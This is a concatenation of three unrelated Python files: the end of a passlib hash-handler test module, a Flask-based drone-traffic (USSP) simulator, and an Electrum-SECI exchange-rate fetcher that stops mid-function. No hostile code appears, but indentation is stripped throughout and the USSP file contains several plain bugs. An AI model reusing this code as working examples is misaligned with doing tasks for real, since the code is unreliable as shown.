self.assertEqual(disabled_other, disabled_stub)
#===================================================================
# eoc
#===================================================================
#=============================================================================
# HandlerCase mixins providing additional tests for certain hashes
#=============================================================================
class OsCryptMixin(HandlerCase):
"""helper used by create_backend_case() which adds additional features
to test the os_crypt backend.
* if crypt support is missing, inserts fake crypt support to simulate
a working safe_crypt, to test passlib's codepath as fully as possible.
* extra tests to verify non-conformant crypt implementations are handled
correctly.
* check that native crypt support is detected correctly for known platforms.
"""
#===================================================================
# class attrs
#===================================================================
# platforms that are known to support / not support this hash natively.
# list of (platform_regex, True|False|None) entries.
platform_crypt_support = []
#: flag indicating backend provides a fallback when safe_crypt() can't handle password
has_os_crypt_fallback = True
#: alternate handler to use when searching for backend to fake safe_crypt() support.
alt_safe_crypt_handler = None
#===================================================================
# instance attrs
#===================================================================
__unittest_skip = True
# force this backend
backend = "os_crypt"
# flag read by HandlerCase to detect if fake os crypt is enabled.
using_patched_crypt = False
#===================================================================
# setup
#===================================================================
def setUp(self):
assert self.backend == "os_crypt"
if not self.handler.has_backend("os_crypt"):
self._patch_safe_crypt()
super(OsCryptMixin, self).setUp()
@classmethod
def _get_safe_crypt_handler_backend(cls):
"""
return (handler, backend) pair to use for faking crypt.crypt() support for hash.
backend will be None if none availabe.
"""
# find handler that generates safe_crypt() compatible hash
handler = cls.alt_safe_crypt_handler
if not handler:
handler = unwrap_handler(cls.handler)
# hack to prevent recursion issue when .has_backend() is called
handler.get_backend()
# find backend which isn't os_crypt
alt_backend = get_alt_backend(handler, "os_crypt")
return handler, alt_backend
def _patch_safe_crypt(self):
"""if crypt() doesn't support current hash alg, this patches
safe_crypt() so that it transparently uses another one of the handler's
backends, so that we can go ahead and test as much of code path
as possible.
"""
# find handler & backend
handler, alt_backend = self._get_safe_crypt_handler_backend()
if not alt_backend:
raise AssertionError("handler has no available alternate backends!")
# create subclass of handler, which we swap to an alternate backend
alt_handler = handler.using()
alt_handler.set_backend(alt_backend)
def crypt_stub(secret, hash):
hash = alt_handler.genhash(secret, hash)
assert isinstance(hash, str)
return hash
import passlib.utils as mod
self.patchAttr(mod, "_crypt", crypt_stub)
self.using_patched_crypt = True
@classmethod
def _get_skip_backend_reason(cls, backend):
"""
make sure os_crypt backend is tested
when it's known os_crypt will be faked by _patch_safe_crypt()
"""
assert backend == "os_crypt"
reason = super(OsCryptMixin, cls)._get_skip_backend_reason(backend)
from passlib.utils import has_crypt
if reason == cls.BACKEND_NOT_AVAILABLE and has_crypt:
if TEST_MODE("full") and cls._get_safe_crypt_handler_backend()[1]:
# in this case, _patch_safe_crypt() will monkeypatch os_crypt
# to use another backend, just so we can test os_crypt fully.
return None
else:
return "hash not supported by os crypt()"
return reason
#===================================================================
# custom tests
#===================================================================
# TODO: turn into decorator, and use mock library.
def _use_mock_crypt(self):
"""
patch passlib.utils.safe_crypt() so it returns mock value for duration of test.
returns function whose .return_value controls what's returned.
this defaults to None.
"""
import passlib.utils as mod
def mock_crypt(secret, config):
# let 'test' string through so _load_os_crypt_backend() will still work
if secret == "test":
return mock_crypt.__wrapped__(secret, config)
else:
return mock_crypt.return_value
mock_crypt.__wrapped__ = mod._crypt
mock_crypt.return_value = None
self.patchAttr(mod, "_crypt", mock_crypt)
return mock_crypt
def test_80_faulty_crypt(self):
"""test with faulty crypt()"""
hash = self.get_sample_hash()[1]
exc_types = (AssertionError,)
mock_crypt = self._use_mock_crypt()
def test(value):
# set safe_crypt() to return specified value, and
# make sure assertion error is raised by handler.
mock_crypt.return_value = value
self.assertRaises(exc_types, self.do_genhash, "stub", hash)
self.assertRaises(exc_types, self.do_encrypt, "stub")
self.assertRaises(exc_types, self.do_verify, "stub", hash)
test('$x' + hash[2:]) # detect wrong prefix
test(hash[:-1]) # detect too short
test(hash + 'x') # detect too long
def test_81_crypt_fallback(self):
"""test per-call crypt() fallback"""
# mock up safe_crypt to return None
mock_crypt = self._use_mock_crypt()
mock_crypt.return_value = None
if self.has_os_crypt_fallback:
# handler should have a fallback to use when os_crypt backend refuses to handle secret.
h1 = self.do_encrypt("stub")
h2 = self.do_genhash("stub", h1)
self.assertEqual(h2, h1)
self.assertTrue(self.do_verify("stub", h1))
else:
# handler should give up
from passlib.exc import MissingBackendError
hash = self.get_sample_hash()[1]
self.assertRaises(MissingBackendError, self.do_encrypt, 'stub')
self.assertRaises(MissingBackendError, self.do_genhash, 'stub', hash)
self.assertRaises(MissingBackendError, self.do_verify, 'stub', hash)
def test_82_crypt_support(self):
"""test platform-specific crypt() support detection"""
# NOTE: this is mainly just a sanity check to ensure the runtime
# detection is functioning correctly on some known platforms,
# so that I can feel more confident it'll work right on unknown ones.
if hasattr(self.handler, "orig_prefix"):
raise self.skipTest("not applicable to wrappers")
platform = sys.platform
for pattern, state in self.platform_crypt_support:
if re.match(pattern, platform):
break
else:
raise self.skipTest("no data for %r platform" % platform)
if state is None:
# e.g. platform='freebsd8' ... sha256_crypt not added until 8.3
raise self.skipTest("varied support on %r platform" % platform)
elif state != self.using_patched_crypt:
return
elif state:
self.fail("expected %r platform would have native support "
"for %r" % (platform, self.handler.name))
else:
self.fail("did not expect %r platform would have native support "
"for %r" % (platform, self.handler.name))
#===================================================================
# fuzzy verified support -- add new verified that uses os crypt()
#===================================================================
def fuzz_verifier_crypt(self):
"""test results against OS crypt()"""
# don't use this if we're faking safe_crypt (pointless test),
# or if handler is a wrapper (only original handler will be supported by os)
handler = self.handler
if self.using_patched_crypt or hasattr(handler, "wrapped"):
return None
# create a wrapper for fuzzy verified to use
from crypt import crypt
encoding = self.FuzzHashGenerator.password_encoding
def check_crypt(secret, hash):
"""stdlib-crypt"""
if not self.crypt_supports_variant(hash):
return "skip"
secret = to_native_str(secret, encoding)
return crypt(secret, hash) == hash
return check_crypt
def crypt_supports_variant(self, hash):
"""
fuzzy_verified_crypt() helper --
used to determine if os crypt() supports a particular hash variant.
"""
return True
#===================================================================
# eoc
#===================================================================
class UserHandlerMixin(HandlerCase):
"""helper for handlers w/ 'user' context kwd; mixin for HandlerCase
this overrides the HandlerCase test harness methods
so that a username is automatically inserted to hash/verify
calls. as well, passing in a pair of strings as the password
will be interpreted as (secret,user)
"""
#===================================================================
# option flags
#===================================================================
default_user = "user"
requires_user = True
user_case_insensitive = False
#===================================================================
# instance attrs
#===================================================================
__unittest_skip = True
#===================================================================
# custom tests
#===================================================================
def test_80_user(self):
"""test user context keyword"""
handler = self.handler
password = 'stub'
hash = handler.hash(password, user=self.default_user)
if self.requires_user:
self.assertRaises(TypeError, handler.hash, password)
self.assertRaises(TypeError, handler.genhash, password, hash)
self.assertRaises(TypeError, handler.verify, password, hash)
else:
# e.g. cisco_pix works with or without one.
handler.hash(password)
handler.genhash(password, hash)
handler.verify(password, hash)
def test_81_user_case(self):
"""test user case sensitivity"""
lower = self.default_user.lower()
upper = lower.upper()
hash = self.do_encrypt('stub', context=dict(user=lower))
if self.user_case_insensitive:
self.assertTrue(self.do_verify('stub', hash, user=upper),
"user should not be case sensitive")
else:
self.assertFalse(self.do_verify('stub', hash, user=upper),
"user should be case sensitive")
def test_82_user_salt(self):
"""test user used as salt"""
config = self.do_stub_encrypt()
h1 = self.do_genhash('stub', config, user='admin')
h2 = self.do_genhash('stub', config, user='admin')
self.assertEqual(h2, h1)
h3 = self.do_genhash('stub', config, user='root')
self.assertNotEqual(h3, h1)
# TODO: user size? kinda dicey, depends on algorithm.
#===================================================================
# override test helpers
#===================================================================
def populate_context(self, secret, kwds):
"""insert username into kwds"""
if isinstance(secret, tuple):
secret, user = secret
elif not self.requires_user:
return secret
else:
user = self.default_user
if 'user' not in kwds:
kwds['user'] = user
return secret
#===================================================================
# modify fuzz testing
#===================================================================
class FuzzHashGenerator(HandlerCase.FuzzHashGenerator):
context_map = HandlerCase.FuzzHashGenerator.context_map.copy()
context_map.update(user="random_user")
user_alphabet = u("asdQWE123")
def random_user(self):
rng = self.rng
if not self.test.requires_user and rng.random() < .1:
return None
return getrandstr(rng, self.user_alphabet, rng.randint(2,10))
#===================================================================
# eoc
#===================================================================
class EncodingHandlerMixin(HandlerCase):
"""helper for handlers w/ 'encoding' context kwd; mixin for HandlerCase
this overrides the HandlerCase test harness methods
so that an encoding can be inserted to hash/verify
calls by passing in a pair of strings as the password
will be interpreted as (secret,encoding)
"""
#===================================================================
# instance attrs
#===================================================================
__unittest_skip = True
# restrict stock passwords & fuzz alphabet to latin-1,
# so different encodings can be tested safely.
stock_passwords = [
u("test"),
b"test",
u("\u00AC\u00BA"),
]
class FuzzHashGenerator(HandlerCase.FuzzHashGenerator):
password_alphabet = u('qwerty1234<>.@*#! \u00AC')
def populate_context(self, secret, kwds):
"""insert encoding into kwds"""
if isinstance(secret, tuple):
secret, encoding = secret
kwds.setdefault('encoding', encoding)
return secret
#===================================================================
# eoc
#===================================================================
#=============================================================================
# warnings helpers
#=============================================================================
class reset_warnings(warnings.catch_warnings):
"""catch_warnings() wrapper which clears warning registry & filters"""
def __init__(self, reset_filter="always", reset_registry=".*", **kwds):
super(reset_warnings, self).__init__(**kwds)
self._reset_filter = reset_filter
self._reset_registry = re.compile(reset_registry) if reset_registry else None
def __enter__(self):
# let parent class archive filter state
ret = super(reset_warnings, self).__enter__()
# reset the filter to list everything
if self._reset_filter:
warnings.resetwarnings()
warnings.simplefilter(self._reset_filter)
# archive and clear the __warningregistry__ key for all modules
# that match the 'reset' pattern.
pattern = self._reset_registry
if pattern:
backup = self._orig_registry = {}
for name, mod in list(sys.modules.items()):
if mod is None or not pattern.match(name):
continue
reg = getattr(mod, "__warningregistry__", None)
if reg:
backup[name] = reg.copy()
reg.clear()
return ret
def __exit__(self, *exc_info):
# restore warning registry for all modules
pattern = self._reset_registry
if pattern:
# restore registry backup, clearing all registry entries that we didn't archive
backup = self._orig_registry
for name, mod in list(sys.modules.items()):
if mod is None or not pattern.match(name):
continue
reg = getattr(mod, "__warningregistry__", None)
if reg:
reg.clear()
orig = backup.get(name)
if orig:
if reg is None:
setattr(mod, "__warningregistry__", orig)
else:
reg.update(orig)
super(reset_warnings, self).__exit__(*exc_info)
#=============================================================================
# eof
#=============================================================================
|
custom_uss.py
|
#!/usr/bin/python3
import json
import os
import uuid
import threading
import time
import logging
import random
from flask_socketio import SocketIO
from datetime import datetime, timedelta
from flask import Flask, request
from isa import ISA
from subscription import Subscription
from flight import Flight
## PARAMS ##
# if True, the USSP will assign a random delay compared to the time start specified when creating the flight
accept_flight_with_random_late_time = True
# hgihest and lowest value for the random delay (in seconds)
random_delay_high = 10 * 60
random_delay_low = 0
class USSP():
"""
USSP actions with API
"""
def __init__(self, _id, _port):
self.id = _id
self.read_token = None
self.write_token = None
self.read_headers = None
self.write_headers = None
self.isas = []
self.subscriptions = []
self.flights = []
print("USSP %s created" % self.id)
self.port = _port
self.app = Flask(__name__)
self.socketio = SocketIO(self.app)
# to disable logging information
# set log disabled to False for all logging information
log = logging.getLogger('werkzeug')
log.disabled = True
## FOR PPRZ -- DONT TOUCH ##
@self.socketio.on('TELEMETRY')
def handle_tele(_tele):
tele = json.loads(_tele)
flight_id = tele["id"]
try:
flight = next(flight for flight in self.flights if str(flight.id) == str(flight_id))
except StopIteration:
print("ERROR THAT SHOULDNT HAPPEN N° 5")
return
flight.last_telemetry_report = tele
if flight.telemetry_started:
pass
else:
print("TELEMETRY STARTED FOR FLIGHT ", flight_id)
flight.telemetry_started = True
@self.app.route("/%s" % self.id , methods=["GET"])
def home_page():
return ("HOMEPAGE")
@self.app.route("/%s/flights" % self.id, methods=["GET", "POST"])
def flights():
## FOR PPRZ -- DONT TOUCH ##
if request.method == 'POST':
print("FLIGHT REQUEST")
data = json.loads(request.data.decode("utf-8"))
# run strategic deconfliction things for vertiports (and airspace ?)
# this will return a time allocated for take off
# until this works, we just send the requested take off time
flight_id = uuid.uuid1()
if accept_flight_with_random_late_time:
delay = random.randint(random_delay_low, random_delay_high)
print("ACCEPTING FLIGHT %s WITH %s DELAY" % (flight_id, delay))
start_time = data["start_time"] + delay
end_time = data["end_time"] + delay
else:
start_time = data["start_time"]
end_time = data["end_time"]
# TODO
# create flight in ussp database and make its information avalable to other ussps
# /!\ requires to assign an ISA to the flight
# for now, we create a flight with just flight_id, start and end time
flight = Flight(flight_id, None, None, None, start_time, end_time)
flight.status = "CREATED"
self.flights.append(flight)
print(flight.get_json())
return flight.get_json()
## END DONT TOUCH ##
## GOOD TO KEEP TO CHECK TELEMETRY HOWEVER ##
elif request.method == 'GET':
flight_info = []
for flight in self.flights:
flight_info.append(flight.get_json())
return(str(flight_info))
@self.app.route("/%s/flights/<string:flight_id>" % self.id, methods=['GET', 'POST'])
def flight_information(flight_id):
if request.method == "POST":
return("POST flight_information")
## GOOD TO KEEP TO CHECK TELEMETRY HOWEVER ##
elif request.method == "GET":
try:
flight = next(flight for flight in self.flights if str(flight.id) == str(flight_id))
return str(flight.get_json())
except StopIteration:
return ("FLIGHT DOESNT EXIST")
## FOR PPRZ -- DONT TOUCH ##
@self.app.route("/%s/flights/<string:flight_id>/start_flight" % self.id, methods=['GET', 'POST'])
def start_flight(flight_id):
# check if flight has been created
# and if time to start is close to current time (complicated?, not for now)
# send flight confirmation message and endpoint to provide telemetry
try:
flight = next(flight for flight in self.flights if str(flight.id) == flight_id)
except StopIteration:
print("ERROR THAT SHOULDNT HAPPEN N° 3")
return 'flight id not found in database', 400
flight.status = "STARTED"
print("STARTING FLIGHT %s" % flight.get_json())
response = json.dumps({
"flight_id": flight_id,
"flight_status": flight.status,
"telemetry_endpoint": "http://localhost:%s" % self.port
})
return response
## END DONT TOUCH ##
## FOR PPRZ -- DONT TOUCH ##
@self.app.route("/%s/flights/<string:flight_id>/end_flight" % self.id, methods=['GET', 'POST'])
def end_flight(flight_id):
try:
flight = next(flight for flight in self.flights if str(flight.id) == flight_id)
except StopIteration:
print("ERROR THAT SHOULDNT HAPPEN N° 7")
return 'flight id not found in database', 400
print ("FLIGHT %s ENDED" % flight_id)
flight.status = "ENDED"
response = json.dumps({
"flight_id": flight_id,
"flight_status": flight.status
})
return response
@self.app.route("/%s/flights/<string:flight_id>/details" % self.id, methods=["GET"])
def get_flight_details(flight_id):
return ("flight details")
## END DONT TOUCH ##
def run_thread_server():
self.app.run('localhost', _port)
self.thread_server = threading.Thread(target=run_thread_server, daemon=True)
self.thread_server.start()
time.sleep(1) # give time for server to start
def authentify_read(self):
"""
Get the token for reading requests.
"""
params = (
('sub', self.id),
('intended_audience', 'localhost'),
('scope', 'dss.read.identification_service_areas'),
('issuer', 'dummy_oauth'),
)
response = request.get('http://localhost:8085/token', params=params)
#print(response.json())
if response.status_code == 200:
self.read_token = response.json()["access_token"]
self.read_headers = {
'Authorization': 'Bearer %s' % self.read_token,
'Content-Type': 'application/json'
}
print("USSP %s auth read with token %s" % (self.id, self.read_token))
else:
print("Error in auth read process %ss" % response.text)
return response.status_code
def authentify_write(self):
"""
Get the token for writing requests.
"""
params = (
('sub', self.id),
('intended_audience', 'localhost'),
('scope', 'dss.write.identification_service_areas'),
('issuer', 'dummy_oauth'),
)
response = request.get('http://localhost:8085/token', params=params)
#print(response.json())
if response.status_code == 200:
self.write_token = response.json()["access_token"]
self.write_headers = {
'Authorization': 'Bearer %s' % self.write_token,
'Content-Type': 'application/json'
}
print("USSP %s auth write with token %s" % (self.id, self.write_token))
else:
print("Error in auth write process %" % response.text)
return response.status_code
"""
ISA METHODS.
"""
def get_isa(self, _isa_id):
"""
Get ISA details by its ID.
"""
url = "http://localhost:8082/v1/dss/identification_service_areas/%s" % _isa_id
response = request.get(url, headers=self.read_headers)
print(response.json())
print("USSP %s attempting to get ISA %s" % (self.id, _isa_id))
print(response.text)
return response
def create_isa(self, _name, _geometry, _time_start, _time_end):
"""
Create an ISA.
"""
new_isa_id = uuid.uuid1()
isa = ISA(new_isa_id, _geometry, _time_start, _time_end)
self.isas.append(isa)
print("ISA created with id %s" % new_isa_id)
print(isa)
def create_isa_test(self):
"""
Create a predetermined ISA "toulouse" for testing.
"""
new_isa_id = uuid.uuid1()
now = datetime.now()
time_start = now.strftime("%Y-%m-%dT%H:%M:%SZ")
tomorrow = datetime.now() + timedelta(days=1)
time_end = tomorrow.strftime("%Y-%m-%dT%H:%M:%SZ")
name = "toulouse"
geometry = {"footprint": {
"vertices": [{
"lng": 1.206266,
"lat": 43.764436
},
{
"lng": 1.258522,
"lat": 43.500720
},
{
"lng": 1.631048,
"lat": 43.515354
},
{
"lng": 1.594875,
"lat": 43.763197
}
]},
"altitude_lo": 0,
"altitude_hi": 500
}
isa = ISA(name, new_isa_id, geometry, time_start, time_end, self.id)
self.isas.append(isa)
print("ISA created with id %s" % new_isa_id)
print(isa)
def submit_isa(self, _isa_id = None, _isa_name = None):
"""
Sybmit ISA to API by its ID or Name.
"""
isa_id = ''
submitted = False
try:
if _isa_id is not None:
isa = next(isa for isa in self.isas if str(isa.id) == str(_isa_id))
isa_id = _isa_id
elif _isa_name is not None:
isa = next(isa for isa in self.isas if str(isa.name) == str(_isa_name))
isa_id = isa.id
submitted = isa.submitted
except StopIteration:
print("ISA not existing in USSP database")
print("Use create_isa before submiting")
if not submitted:
payload = json.dumps({
"extents": {
"spatial_volume": isa.geometry,
"time_start": isa.time_start,
"time_end": isa.time_end
},
"flights_url": "http://localhost:%s/%s/%s" % (self.port, self.id, isa.id)
})
print("USSP %s attempting to submit ISA %s" % (self.id, isa_id))
response = request.request('PUT', "http://localhost:8082/v1/dss/identification_service_areas/%s" % isa_id, headers=self.write_headers, data=payload)
#print(response.json())
if response.status_code == 200:
print("ISA successfully submitted")
isa.submitted = True
else:
print("ISA already submitted")
print(response.text)
def delete_isa(self, _isa_id = None, _isa_name = None):
"""
Deleting an ISA by its ID or its Name.
"""
isa_id = ''
submitted = True
try:
print("Attempting to delete ISA from USSP database")
if _isa_id is not None:
isa = next(isa for isa in self.isas if str(isa.id) == str(_isa_id))
isa_id = _isa_id
elif _isa_name is not None:
isa = next(isa for isa in self.isas if str(isa.name) == str(_isa_name))
isa_id = isa.id
submitted = isa.submitted
del isa
print("ISA %s deleted from local USSP database" % isa_id)
except StopIteration:
print("ISA not existing in USSP database")
isa_id = _isa_id
if submitted:
print("Attempting to delete ISA %s from DSS database" % isa_id)
dss_isa = self.get_isa(isa_id)
dss_isa_version = dss_isa.json()['service_area']['version']
url = "http://localhost:8082/v1/dss/identification_service_areas/%s/%s" % (isa_id, dss_isa_version)
response = request.delete(url, headers=self.write_headers)
#print(response.json())
if response.status_code == 200:
print("ISA successfully deleted from DSS database")
else:
print("Error when attempting to delete ISA from DSS")
print(response.text)
else:
print("The ISA was not submitted to DSS, cant delete from DSS")
"""
SUBSCRIPTION METHODS.
"""
def get_subscription(self, _sub_id):
"""
Get a Sub by its ID.
"""
print("sub_id : ", _sub_id)
url = "http://localhost:8082/v1/dss/subscriptions/%s" % _sub_id
response = request.get(url, headers=self.read_headers)
print(response.json())
print("USSP %s attempting to get subscription %s" % (self.id, _sub_id))
print(response.text)
if response.status_code == 200:
return response
else:
return None
def create_subscription_test(self):
"""
Create a predetermined Sub with Name 'toulouse' for testing.
"""
new_sub_id = uuid.uuid1()
now = datetime.now()
time_start = now.strftime("%Y-%m-%dT%H:%M:%SZ")
tomorrow = datetime.now() + timedelta(days=1)
time_end = tomorrow.strftime("%Y-%m-%dT%H:%M:%SZ")
name = "toulouse"
geometry = {"footprint": {
"vertices": [{
"lng": 1.206266,
"lat": 43.764436
},
{
"lng": 1.258522,
"lat": 43.500720
},
{
"lng": 1.631048,
"lat": 43.515354
},
{
"lng": 1.594875,
"lat": 43.763197
}
]},
"altitude_lo": 0,
"altitude_hi": 500
}
subscription = Subscription(name, new_sub_id, geometry, time_start, time_end)
self.subscriptions.append(subscription)
print("Subscription created with id %s" % new_sub_id)
print(subscription)
def create_subscription(self, _name, _geometry, _time_start, _time_end):
"""
Create a Sub.
"""
new_sub_id = uuid.uuid1()
subscription = Subscription(_name, new_sub_id, _geometry, _time_start, _time_end)
self.subscriptions.append(subscription)
print("Subscription created with id %s" % new_sub_id)
print(subscription)
def submit_subscription(self, _sub_id = None, _sub_name = None):
"""
Submit a Sub to API by its ID or Name.
"""
sub_id = ''
submitted = False
try:
if _sub_id is not None:
subscription = next(sub for sub in self.subscriptions if str(sub.id) == str(_sub_id))
sub_id = _sub_id
elif _sub_name is not None:
subscription = next(sub for sub in self.subscriptions if str(sub.name) == str(_sub_name))
sub_id = subscription.id
submitted = subscription.submitted
except StopIteration:
print("Subscription not existing in USSP database")
print("Use create_sub before submiting")
if not submitted:
payload = json.dumps({
"extents": {
"spatial_volume": subscription.geometry,
"time_start": subscription.time_start,
"time_end": subscription.time_end
},
"callbacks": {
"identification_service_area_url": "http://localhost:%s/%s/%s" % (self.port, self.id, subscription.id)
}
})
print("USSP %s attempting to subscribe with sub_id %s" % (self.id, sub_id))
response = request.request('PUT', "http://localhost:8082/v1/dss/subscriptions/%s" % sub_id, headers=self.read_headers, data=payload)
#print(response.json())
if response.status_code == 200:
print("Subscription successfully submitted")
subscription.submitted = True
else:
print("Subscription not submitted")
print(response.text)
def delete_subscription(self, _sub_id = None, _sub_name = None):
"""
Delete a Sub by its ID or Name.
"""
sub_id = ''
submitted = True
try:
print("Attempting to delete subscription from USSP database")
if _sub_id is not None:
subscription = next(sub for sub in self.subscriptions if str(sub.id) == str(_sub_id))
sub_id = _sub_id
elif _sub_name is not None:
subscription = next(sub for sub in self.subscriptions if str(sub.name) == str(_sub_name))
sub_id = subscription.id
submitted = subscription.submitted
del subscription
print("Subscription deleted from local USSP database")
except StopIteration:
print("Subscription not existing in USSP database")
sub_id = _sub_id
if submitted:
print("Attempting to delete subscription from DSS database")
dss_sub = self.get_subscription(sub_id)
dss_sub_version = dss_sub.json()['subscription']['version']
url = "http://localhost:8082/v1/dss/subscriptions/%s/%s" % (sub_id, dss_sub_version)
response = request.delete(url, headers=self.read_headers)
#print(response.json())
if response.status_code == 200:
print("Subscription successfully deleted from DSS database")
else:
print("Error when attempting to delete sub from DSS")
print(response.text)
else:
print("The subscription was not submitted to DSS, cant delete from DSS")
def create_flight(self, _data):
#data = json.dumps(_data.decode('utf8').replace("'", '"'))
data = json.loads(_data.decode('utf8'))
print(data)
id = uuid.uuid1()
buffer = data["buffer"]
max_alt = data["max_alt"]
min_alt = data["min_alt"]
time_start = data["time_start"]
time_end = ["time_end"]
flight = Flight(id, buffer, max_alt, min_alt, time_start, time_end)
self.flights.append(flight)
return flight
def assign_isa_to_flight(self, flight):
# here we just check if toulouse ISA exists for the flight
# we consider that in our scenario all flights will take place in toulouse
# and assign it to the flight
# TODO later : make something that really does the job
for isa in self.isas:
if isa.name == "toulouse":
flight.assigned_isa_id = isa.id
def start_flight(self, flight_id):
for flight in self.flight:
if flight.id == flight_id:
# ASSIGN ISA AND CONFIRM FLIGHT START
self.assign_isa_to_flight(flight)
flight.status = "STARTED"
return True, flight.get_json()
else:
return False, "FLIGHT NOT EXISTING, REQUEST DENIED"
# def update_flight_status(self, flight_id, status) waiting for clearance, active
# def check_flight_conformity(self, flight_id), check if its in the stated isas
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import traceback
import csv
from decimal import Decimal
from bitcoin import COIN
from i18n import _
from util import PrintError, ThreadJob
from util import format_satoshis
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0,
# Not ISO 4217.
'BTC': 8}
DEFAULT_EXCHANGE = 'Bittrex'
DEFAULT_CCY = 'BTC'
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Electrum-SECI'
})
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Electrum-SECI'
})
reader = csv.DictReader(response.content.split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def get_historical_rates_safe(self, ccy):
try:
self.print_error("requesting fx history for", ccy)
self.history[ccy] = self.historical_rates(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
def get_historical_rates(self, ccy):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
t.setDaemon(True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.iteritems() if b is not None and len(a)==3])
class Bittrex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bittrex.com',
'/api/v1.1/public/getticker?market=BTC-SECI')
quote_currencies = {}
if not json.get('success', False):
return quote_currencies
last = Decimal(json['result']['Last'])
quote_currencies['BTC'] = last
return quote_currencies
class Poloniex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('poloniex.com', '/public?command=returnTicker')
quote_currencies = {}
seci_ticker = json.get('BTC_SECI')
quote_currencies['BTC'] = Decimal(seci_ticker['last'])
return quote_currencies
class CoinMarketCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinmarketcap.com', '/v1/ticker/seci/')
quote_currencies = {}
if not isinstance(json, list):
return quote_currencies
json = json[0]
for ccy, key in [
('USD', 'price_usd'),
('BTC', 'price_btc'),
]:
quote_currencies[ccy] = Decimal(json[key])
return quote_currencies
def dictinvert(d):
inv = {}
for k, vlist in d.iteritems():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
return json.loads(open(path, 'r').read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
except:
continue
with open(path, 'w') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.set_exchange(self.config_exchange())
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
return fmt_str.format(round(amount, prec))
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", DEFAULT_CCY)
def config_exchange(self):
return self.config.get('use_exchange', DEFAULT_EXCHANGE)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Bittrex)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
def on_quotes(self):
self.network.trigger_callback('on_quotes')
def on_history(self):
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def value_str(self, satoshis, rate):
